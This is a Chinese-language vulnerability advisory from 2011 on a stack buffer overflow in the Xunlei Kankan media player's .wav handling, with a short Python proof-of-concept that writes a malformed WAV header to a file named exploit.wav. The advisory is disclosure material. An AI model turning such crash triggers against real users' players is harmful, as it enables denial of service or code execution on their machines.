安全研究
安全漏洞
Thunder kankan player ".wav"文件远程栈缓冲区溢出漏洞
发布日期:2011-11-18
更新日期:2011-11-21
受影响系统:
XunLei kankan player 4.8.3.840描述:
BUGTRAQ ID: 50725
迅雷看看(原迅雷影音),更好地整合了迅雷网页看看的特性,支持本地播放与在线视频点播的播放器。
迅雷看看播放器在处理畸形.wav文件时存在远程栈缓冲区溢出漏洞,攻击者可利用此漏洞执行任意代码或造成拒绝服务。
<*来源:hellok
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
print """
#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0 ___ ___ ___ ___ ___ ___ 1
#1 /\__\ /\ \ /\__\ /\__\ /\ \ /\__\ 0
#0 /:/ / /::\ \ /:/ / /:/ / /::\ \ /:/ / 1
#1 /:/__/ /:/\:\ \ /:/ / /:/ / /:/\:\ \ /:/__/ 0
#0 /::\ \ ___ /::\~\:\ \ /:/ / /:/ / /:/ \:\ \ /::\__\____ 1
#1 /:/\:\ /\__\ /:/\:\ \:\__\ /:/__/ /:/__/ /:/__/ \:\__\ /:/\:::::\__\0
#0 \/__\:\/:/ / \:\~\:\ \/__/ \:\ \ \:\ \ \:\ \ /:/ / \/_|:|~~|~ 1
#1 \::/ / \:\ \:\__\ \:\ \ \:\ \ \:\ /:/ / |:| | 0
#0 /:/ / \:\ \/__/ \:\ \ \:\ \ \:\/:/ / |:| | 1
#1 /:/ / \:\__\ \:\__\ \:\__\ \::/ / |:| | 0
#0 \/__/ \/__/ \/__/ \/__/ \/__/ \|__| 1
#1 0
#0 [+] Exploit Title: Thunder kankan player Stack overflow/DOS Exploit 1
#1 [+] Date :11/17/2011 0
#0 [+] Author: hellok(warptencq[dot]gmail.com) 1
#1 [+] Software Link: dl.xunlei.com/xmp.html 0
#0 [+] Version : 4.8.3.840(last) 1
#1 [+] Tested On: WIN 7 0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-1
"""
filepath = "exploit.wav"
f = open(filepath, "wb")
file = '\x52\x49\x46\x46\x62\xb8\x20\x20\x57\x41\x56\x45\x66\x6d\x74\x20'
f.write(file)
f.close()
print "Done.\nOpen exploit.wav"
建议:
厂商补丁:
XunLei
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://dl.xunlei.com/wxl.html
浏览次数:2553
严重程度:0(网友投票)
绿盟科技给您安全的保障